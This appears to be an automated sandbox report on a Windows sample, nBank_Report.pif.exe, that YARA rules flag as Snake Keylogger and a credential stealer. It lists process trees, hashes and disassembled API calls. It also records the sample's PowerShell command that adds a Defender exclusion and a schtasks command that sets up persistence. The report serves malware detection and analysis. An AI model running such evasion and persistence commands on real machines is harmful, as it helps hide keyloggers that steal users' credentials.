                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
                                              Imagebase:0x700000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"
                                              Imagebase:0xe50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\nBank_Report.pif.exe"
                                              Imagebase:0x220000
                                              File size:945'664 bytes
                                              MD5 hash:D97C2259E60A42AEAD2559F198FF9A5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:05:33:20
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\nBank_Report.pif.exe"
                                              Imagebase:0x730000
                                              File size:945'664 bytes
                                              MD5 hash:D97C2259E60A42AEAD2559F198FF9A5A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3886664444.0000000007090000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.3867494805.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3867494805.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3867494805.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3871996905.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:05:33:22
                                              Start date:26/09/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6616b0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:05:33:22
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              Imagebase:0xb10000
                                              File size:945'664 bytes
                                              MD5 hash:D97C2259E60A42AEAD2559F198FF9A5A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 42%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:05:33:27
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"
                                              Imagebase:0xe50000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:05:33:27
                                              Start date:26/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:05:33:27
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
                                              Imagebase:0x510000
                                              File size:945'664 bytes
                                              MD5 hash:D97C2259E60A42AEAD2559F198FF9A5A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:05:33:39
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540
                                              Imagebase:0xed0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:7.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:38
                                                Total number of Limit Nodes:7
                                                execution_graph 16220 155d340 16221 155d386 GetCurrentProcess 16220->16221 16223 155d3d1 16221->16223 16224 155d3d8 GetCurrentThread 16221->16224 16223->16224 16225 155d415 GetCurrentProcess 16224->16225 16226 155d40e 16224->16226 16227 155d44b 16225->16227 16226->16225 16228 155d473 GetCurrentThreadId 16227->16228 16229 155d4a4 16228->16229 16230 155afb0 16234 155b097 16230->16234 16239 155b0a8 16230->16239 16231 155afbf 16235 155b0dc 16234->16235 16236 155b0b9 16234->16236 16235->16231 16236->16235 16237 155b2e0 GetModuleHandleW 16236->16237 16238 155b30d 16237->16238 16238->16231 16240 155b0dc 16239->16240 16241 155b0b9 16239->16241 16240->16231 16241->16240 16242 155b2e0 GetModuleHandleW 16241->16242 16243 155b30d 16242->16243 16243->16231 16244 1554668 16245 155467a 16244->16245 16246 1554686 16245->16246 16248 1554779 16245->16248 16249 155479d 16248->16249 16253 1554879 16249->16253 16257 1554888 16249->16257 16255 15548af 16253->16255 16254 155498c 16255->16254 16261 15544b4 16255->16261 16259 15548af 16257->16259 16258 155498c 16259->16258 16260 15544b4 CreateActCtxA 16259->16260 16260->16258 16262 1555918 CreateActCtxA 16261->16262 16264 15559db 16262->16264 16265 155d588 DuplicateHandle 16266 155d61e 16265->16266

                                                Executed Functions

                                                Function 0155D331 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0155D3BE
                                                • GetCurrentThread.KERNEL32 ref: 0155D3FB
                                                • GetCurrentProcess.KERNEL32 ref: 0155D438
                                                • GetCurrentThreadId.KERNEL32 ref: 0155D491
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 9883d5fcc6925318b80d71f99a5839d70c6823a7905d37b9b55fe0dc3a8f5e4c
                                                • Instruction ID: c9c58109ed9d17ceba920af595c0ff5fdad9d1ad5cd2cdaffd7fe84086e4672f
                                                • Opcode Fuzzy Hash: 9883d5fcc6925318b80d71f99a5839d70c6823a7905d37b9b55fe0dc3a8f5e4c
                                                • Instruction Fuzzy Hash: 795156B0910349CFDB18CFAAD588BDEBBF1FF48304F20845AD419AB251D7786985CB66
                                                Function 0155D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0155D3BE
                                                • GetCurrentThread.KERNEL32 ref: 0155D3FB
                                                • GetCurrentProcess.KERNEL32 ref: 0155D438
                                                • GetCurrentThreadId.KERNEL32 ref: 0155D491
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: b42d690fb51d97334ff8e9c7894ba3f327e86e762d3b3a9c876a6868367f0efc
                                                • Instruction ID: cb236558e8a2586d79c54f11c53f842d00998b691144f680c2b6201407aef1c9
                                                • Opcode Fuzzy Hash: b42d690fb51d97334ff8e9c7894ba3f327e86e762d3b3a9c876a6868367f0efc
                                                • Instruction Fuzzy Hash: 0B5145B0910349CFDB58CFAAD548BDEBBF1FF88304F20845AD419A7250D7786985CB65
                                                Function 0155B0A8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 155b0a8-155b0b7 45 155b0e3-155b0e7 44->45 46 155b0b9-155b0c6 call 1559b14 44->46 48 155b0e9-155b0f3 45->48 49 155b0fb-155b13c 45->49 53 155b0dc 46->53 54 155b0c8 46->54 48->49 55 155b13e-155b146 49->55 56 155b149-155b157 49->56 53->45 99 155b0ce call 155b331 54->99 100 155b0ce call 155b340 54->100 55->56 57 155b159-155b15e 56->57 58 155b17b-155b17d 56->58 61 155b160-155b167 call 155ad10 57->61 62 155b169 57->62 60 155b180-155b187 58->60 59 155b0d4-155b0d6 59->53 63 155b218-155b2d8 59->63 66 155b194-155b19b 60->66 67 155b189-155b191 60->67 64 155b16b-155b179 61->64 62->64 94 155b2e0-155b30b GetModuleHandleW 63->94 95 155b2da-155b2dd 63->95 64->60 70 155b19d-155b1a5 66->70 71 155b1a8-155b1b1 call 155ad20 66->71 67->66 70->71 75 155b1b3-155b1bb 71->75 76 155b1be-155b1c3 71->76 75->76 77 155b1c5-155b1cc 76->77 78 155b1e1-155b1ee 76->78 77->78 80 155b1ce-155b1de call 155ad30 call 155ad40 77->80 85 155b211-155b217 78->85 86 155b1f0-155b20e 78->86 80->78 86->85 96 155b314-155b328 94->96 97 155b30d-155b313 94->97 95->94 97->96 99->59 100->59
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0155B2FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2715be8a78e8743616d8dcf0bfa0cbc41e9099aa502972eb7b82bfe931f6d5d5
                                                • Instruction ID: 76534e1551869e9e9cd925b5df45058cca385801eee59a854f32d864ac49d1bf
                                                • Opcode Fuzzy Hash: 2715be8a78e8743616d8dcf0bfa0cbc41e9099aa502972eb7b82bfe931f6d5d5
                                                • Instruction Fuzzy Hash: 06715770A00B058FD7A4DF2AD45575ABBF2FF88204F008A2ED89ADBB50D775E845CB91
                                                Function 0155590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 101 155590c-15559d9 CreateActCtxA 103 15559e2-1555a3c 101->103 104 15559db-15559e1 101->104 111 1555a3e-1555a41 103->111 112 1555a4b-1555a4f 103->112 104->103 111->112 113 1555a51-1555a5d 112->113 114 1555a60 112->114 113->114 116 1555a61 114->116 116->116
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: bd60f0fedfa8163f9c8a096a3525d74d5a09b6409d4720457bd86bdbdc9baa25
                                                • Instruction ID: 84ac2df64d5375cbf80126f2ba8f7c269c4cc10650d587b9c301d27dd1b6c2fb
                                                • Opcode Fuzzy Hash: bd60f0fedfa8163f9c8a096a3525d74d5a09b6409d4720457bd86bdbdc9baa25
                                                • Instruction Fuzzy Hash: F441E371C11719CFEB24CFA9C8857CDBBB5BF48314F20806AD808AB251DB796946CF90
                                                Function 015544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 117 15544b4-15559d9 CreateActCtxA 120 15559e2-1555a3c 117->120 121 15559db-15559e1 117->121 128 1555a3e-1555a41 120->128 129 1555a4b-1555a4f 120->129 121->120 128->129 130 1555a51-1555a5d 129->130 131 1555a60 129->131 130->131 133 1555a61 131->133 133->133
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 015559C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 9f6c3c0c10017098175f0e8431c2f342d4e65dbf8dbad1bc3a091332395378b1
                                                • Instruction ID: a79e6ffb7002613ade141081e7d889d4d04fcff87768d9920da9dc5ca2181f81
                                                • Opcode Fuzzy Hash: 9f6c3c0c10017098175f0e8431c2f342d4e65dbf8dbad1bc3a091332395378b1
                                                • Instruction Fuzzy Hash: 3C41D470C10719CBEF64CFA9C88578EBBF5BF49304F20846AD809AB251DB756946CF90
                                                Function 0155D588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 134 155d588-155d61c DuplicateHandle 135 155d625-155d642 134->135 136 155d61e-155d624 134->136 136->135
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D60F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 9a789a351bdf45ea41ebbfae5bc8eb01bb5181720b4b9925076c13d75c3dc009
                                                • Instruction ID: 92a15f7f5e47b06fdadb00bdb32dbcec9b269153f8368ca6fb4ce12099e361c6
                                                • Opcode Fuzzy Hash: 9a789a351bdf45ea41ebbfae5bc8eb01bb5181720b4b9925076c13d75c3dc009
                                                • Instruction Fuzzy Hash: F321E3B59002489FDB10CF9AD885ADEBBF5FB48310F14841AE918A7210D378A951CF64
                                                Function 0155D581 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 155d581-155d61c DuplicateHandle 140 155d625-155d642 139->140 141 155d61e-155d624 139->141 141->140
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D60F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 7d9fe52d220e3ac021d491b7931be39fd230e7de8ec9edb43baf14e7018ed5c2
                                                • Instruction ID: ba06eccdcc5fb03a7ee7ce7e61075e8ba7f9287ab73b91a7e253a551d1edc357
                                                • Opcode Fuzzy Hash: 7d9fe52d220e3ac021d491b7931be39fd230e7de8ec9edb43baf14e7018ed5c2
                                                • Instruction Fuzzy Hash: EE21DFB59002089FDB10CFAAD585BDEBBF5FB48310F14841AE918A7210D378A955CF65
                                                Function 0155B298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 144 155b298-155b2d8 145 155b2e0-155b30b GetModuleHandleW 144->145 146 155b2da-155b2dd 144->146 147 155b314-155b328 145->147 148 155b30d-155b313 145->148 146->145 148->147
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0155B2FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477119935.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1550000_nBank_Report.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: cd462d0282118dda1f7d7a535cab3374940b68ec2d1620b547e0fab67455c227
                                                • Instruction ID: 75b45dc0db2a2263fe00df983b0477b347c4df27d5894e6abb517b8022d33edd
                                                • Opcode Fuzzy Hash: cd462d0282118dda1f7d7a535cab3374940b68ec2d1620b547e0fab67455c227
                                                • Instruction Fuzzy Hash: B811DFB5C002498FDB20CF9AD445BDEFBF5EB88214F10841AD929A7210D379A545CFA5
                                                Function 0112D3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33b2d654fc1eda9636aa7aec1319b7e2d4e7f89c6db9776dac23a0f1d3479ac5
                                                • Instruction ID: 381a60f7d260bd2f06fe684c2c4e5bc077939cbcefc93342b346ce6322d87062
                                                • Opcode Fuzzy Hash: 33b2d654fc1eda9636aa7aec1319b7e2d4e7f89c6db9776dac23a0f1d3479ac5
                                                • Instruction Fuzzy Hash: E02103B1504284DFDF09DF94E9C0B56BB65FB88324F20C169E9090B656C33AE466CBA2
                                                Function 0112D4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a34b228a65463ab03f38f3ce268f4459f389e3bb34f17355684f51d51c03a50
                                                • Instruction ID: f1a6bb6fbd6ae5c8f87f8b86df978157d183b0a249ed75525f5634542add8fb5
                                                • Opcode Fuzzy Hash: 4a34b228a65463ab03f38f3ce268f4459f389e3bb34f17355684f51d51c03a50
                                                • Instruction Fuzzy Hash: 3D210371504240DFDF19DF54E9C0F26BF75FB88318F20C5A9E8090B256C376D466CAA2
                                                Function 0137D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476714387.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_137d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce27f8e9c8bc01f444d18843a8265088e6a90e16cbf023e3f9e9ee8a31da2ce
                                                • Instruction ID: 86ce167eb28ff8d7269e50df62e2d4b2437689fc16d0453c8ec2913c8f7ac45d
                                                • Opcode Fuzzy Hash: 6ce27f8e9c8bc01f444d18843a8265088e6a90e16cbf023e3f9e9ee8a31da2ce
                                                • Instruction Fuzzy Hash: 6C212271604304DFDB26DF54D9C0B16BBA5FF88358F20C56DD80A0B246C33AD847CA62
                                                Function 0137D006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476714387.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_137d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bad82ad73574d528d9a9525e207e67edb5ddd3c14af9c15bc3662e51171acca3
                                                • Instruction ID: ce97941b038b111f73e685c4556332a6a48866d8e5320310fc2b7b9ac112945c
                                                • Opcode Fuzzy Hash: bad82ad73574d528d9a9525e207e67edb5ddd3c14af9c15bc3662e51171acca3
                                                • Instruction Fuzzy Hash: 3B219F755093808FCB13CF24D990715BF71EF46218F28C5EAD8498F6A7C33A980ACB62
                                                Function 0112D3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 4e0d4ae337f017905709dddb459026df783348e5c031c68a0be511bdacaf9740
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 2111CD72404280CFDF0ACF44D9C0B56BF61FB84224F2482A9D8090B656C33AE466CBA2
                                                Function 0112D4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 1617bcead5e8da92b8dc14c57e0c96c93c8cc692825247b52dc4d67c98af527d
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 1311AF76504280CFDF1ACF54E5C4B16BF71FB88314F24C6A9D8494B656C336D466CBA2
                                                Function 0112D731 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2dea04f1412201c93c8bdd7a42855ae720fa5e071b60f9b6baf4f5f1c4e12ff
                                                • Instruction ID: 1d90a2d069b2b2bc80af5bd15e250000e92daedbbaff4508af03ba857b27843f
                                                • Opcode Fuzzy Hash: b2dea04f1412201c93c8bdd7a42855ae720fa5e071b60f9b6baf4f5f1c4e12ff
                                                • Instruction Fuzzy Hash: B501DB314047D49FFB198AA5DDC4B66FBA8EF81268F14C419ED494A183D37C9840CAB6
                                                Function 0112D730 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475008821.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_112d000_nBank_Report.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71f4e97904150f45e097cb400a17c87d4075cf2a146f5c44de14dc3572699646
                                                • Instruction ID: 48e826d139d898e101aff2cc302dab6da31ba38f4439c80f141848de0eaa0e5f
